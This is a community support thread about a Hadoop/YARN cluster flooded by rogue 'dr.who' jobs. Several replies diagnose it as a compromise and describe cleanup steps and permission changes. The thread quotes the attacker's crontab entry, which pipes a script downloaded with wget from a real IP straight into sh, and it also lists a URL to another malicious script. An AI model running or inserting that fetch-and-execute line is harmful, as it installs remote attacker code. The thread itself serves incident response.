Support Questions

Find answers, ask questions, and share your expertise

Why are there dr.who "MYYARN" applications running and all failing in what seems to be a loop?

avatar
New Contributor

We're running a HDP 2.5 cluster and today we noticed a series of dr.who "MYYARN" applications running, failing, and then resubmitting to YARN again and again. In what seems to be an "infinite loop". We can't figure out what the applications are doing and why they are failing. Any thoughts? Many thanks in advance!

34 REPLIES 34

avatar
New Contributor

I experienced the problem on a new cluster, it was flooded with strange jobs from nowhere. In my case, the following was found in the crontab of 'yarn' user on each host:

*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1

So, the suggestion is first to check 'sudo -u yarn crontab -l' (or maybe sudo -u dr.who). Still don't know, how it was infected.

avatar
Super Guru
@David

I ran into something like this recently on a POC cluster. The problem seen on this cluster was a "yarn" process was consuming 100% of cpu resources on multiple servers. We shutdown all of the HDP services via Ambari to make sure there wasn't any rogue HDP processes running. This "yarn" process was still running.

It turns out it was a process running this:

/var/tmp/java -c /var/tmp/w.conf

Killing the process with "kill -9" would kill the process off only for it to respawn a few seconds later. Removing the "/var/tmp/java" file also only worked for a few seconds before it too returned.

We ended up looking at crontab and found this:

$ sudo -u yarn crontab -e
*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1

We removed the crontab entry, killed the running process and remove the java file on all nodes. The processes no longer returned and we restarted the HDP cluster via Ambari. The root cause appeared to be security group rules on AWS allowing access to the cluster.

I've seen variations of this reported out of /tmp/java and using "h.conf" instead of "w.conf".

avatar
New Contributor

I solved this problem by change the owner and permission of dr.who path:

chown -R root:root /var/log/hadoop/yarn/local/usercache/dr.who
chmod -R 400 /var/log/hadoop/yarn/local/usercache/dr.who

or

chown -R root:root /hadoop/yarn/local/usercache/dr.who

chmod -R 400 /hadoop/yarn/local/usercache/dr.who

Now, the "NodeManagers" don't stop for this problem anymore.

avatar

facing similiar issue where the shell script is being used to download and create cron

https://bitbucket.org/mrandma12/mygit/raw/master/zz.sh

avatar